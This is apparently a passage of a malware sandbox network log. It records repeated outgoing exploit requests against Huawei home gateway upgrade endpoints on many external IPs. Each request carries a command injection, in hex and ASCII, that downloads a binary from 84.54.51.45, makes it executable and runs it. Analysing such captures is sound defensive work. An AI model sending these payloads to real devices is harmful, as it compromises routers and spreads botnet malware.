                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            191192.168.2.1540622197.127.246.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177426100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            192192.168.2.1537260197.193.202.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177443981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            193192.168.2.1535984197.175.231.7937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177496910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            194192.168.2.1541842197.73.194.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177508116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            195192.168.2.1548792197.24.25.8537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177525997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            196192.168.2.1552566197.146.199.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177577019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            197192.168.2.1556096197.201.13.537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177580118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            198192.168.2.1535868197.71.147.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177613020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            199192.168.2.1542432197.202.100.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177686930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            200192.168.2.1546886197.248.25.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177686930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 